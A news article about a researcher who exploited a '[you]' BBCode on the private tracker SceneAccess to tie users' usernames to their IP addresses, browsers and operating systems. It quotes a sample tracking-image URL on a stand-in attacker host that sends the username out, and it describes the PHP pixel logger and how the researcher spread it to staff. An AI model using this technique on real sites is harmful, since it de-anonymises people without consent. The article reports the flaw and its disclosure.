A vulnerability in a popular private tracker has enabled a security expert to extract private data about site members and staff. The flaw, which was discovered by a concerned member, was a relatively easy exploit but one that could have had serious consequences. The possibility remains that other sites are also affected.

On a very basic level torrent sites come in two flavors. On the one hand there’s public sites such as KickassTorrents and Pirate Bay, on the other there are closed communities that tend to stay out of public view.

These closed communities are known as private trackers and they’re often difficult to gain access to. This is supposed to enhance their security and in many cases indeed does but problems do exist as today’s news illustrates.

Several weeks ago TorrentFreak was contacted by a security researcher who proposed that we write an article on how law enforcement would be able to uncover crucial information about the operators, staff, uploaders and users of one of the most well-known private trackers.

Several days later our tipster, who told us he has worked in website security for many years, said that he’d managed to exploit a flaw in the tracker to extract sensitive information about its users.

“I can identify a user to an IP address. This is useful against owners/staff and uploaders. If I worked for a government organization, I could target the owner of the IP to hand over data,” he explained.

“Also I am able to gather browser (and its version) and operation system. If they are running vulnerable versions, [an attacker] could try to target them.”

At this point the security worker declined our request to identify the site since there was no simple way he could inform them of the issues without risking his membership. However, he was prepared to explain how the exploit worked.

“The website uses BBCode for forums and private messages (to bold things, insert emoji, and photos),” he explained.

“One of the BBCodes this site uses is [you]. If you place this in a forum or a private message it will insert the user’s logon name, that is viewing the page. If my username was ‘Randomusername’, and someone sent me a private message saying ‘Hello [you]!’, when I opened it, the BBcode would translate to ‘Hello Randomusername!'”

While this sounds harmless enough, there’s a real sting in the tail. According to the researcher he was able to set up a remote system on a server under his control to extract IP addresses and other information of the people who read postings formatted in this fashion.

“When you add [you] on the end of an image, you get something like this http://myevilsite.com/photo.php?u=[you].jpg. On this PHP page [on a remote site], you generate a transparent 1 pixel x 1 pixel image. But as it is PHP, you run commands to gather the IP address, gather the OS, and gather the browser and version [of the person viewing it],” he explained.

“When people viewed the page, they didn’t know that a tiny image was stealing their information.”

And it appears he did manage to extract a considerable amount of sensitive information.

“The next part was how to get the maximum amount of viewers of my transparent PHP image. So I decided to post in various forums. I also messaged staff and uploaders directly. Once these people viewed the post/message, it would load the transparent image, and I would store all of the above information, which mapped back to their username on the site,” he explained.

Weeks passed by without TF hearing anything further and without knowing the name of the site we decided to sit on the information. But then, more than a month after first contact we were contacted again, this time with information that confirmed the affected site was popular private tracker SceneAccess.

Part of the code used to extract the data

In the interests of security, TorrentFreak immediately contacted the site’s staff and informed them of the problems before anyone else could carry out the same exploit. The disclosure would also given the site the opportunity to advise its members of the flaw but at this point it’s unclear whether it has done so.

Although one can’t be sure that the exploit hadn’t already been discovered by someone else, the researcher who contacted us didn’t appear to have any malice towards the site and expressed no intention of doing anything bad with the data.

“I am into web application security and I naturally check for ways that could compromise the sites I use. I have done this for my company, my banks and even my torrent sites. I also teach a website hacking class, pretty regularly,” he explained.

However, the researcher claims that he did manage to get a lot of data which attached usernames to IP addresses, including those of staff and uploaders. It’s not clear how many had taken precautions to hide their identities on site but the researchers feels not all of them did.

“From my data not all of them are using VPNs or seed boxes,” he said.

As can be seen from the somewhat intentionally blurry, heavily redacted and incomplete screenshot below, the database compiled by the researcher is considerable and includes sensitive details of uploaders and staff members.

Some of the data extracted from the site

While the vulnerability is easily fixed, the researcher says that other private trackers using the same feature could also be prone to having data extracted in the same manner.

“Typically the [you] BBCode wouldn’t be a vulnerability on any average site. But on a private site, that does questionable things, it turns into a vulnerability. I do not know if anyone else has implemented the [you] BBCode, but I do know that it is specifically on the ‘NOT going to happen’ list on TorrentBytes,” he says.

Of course, the limited numbers of people on private trackers means that there is less chance of something like this being exploited. Also, the invite systems on private sites go some way to keeping undesirables out. However, as the researcher notes, these systems aren’t watertight.

“Members get invites that they can give or sell to other people. Even though selling is against the rules, people still do it and someone really looking to take them down, wouldn’t mind spending a couple of bucks,” he concludes.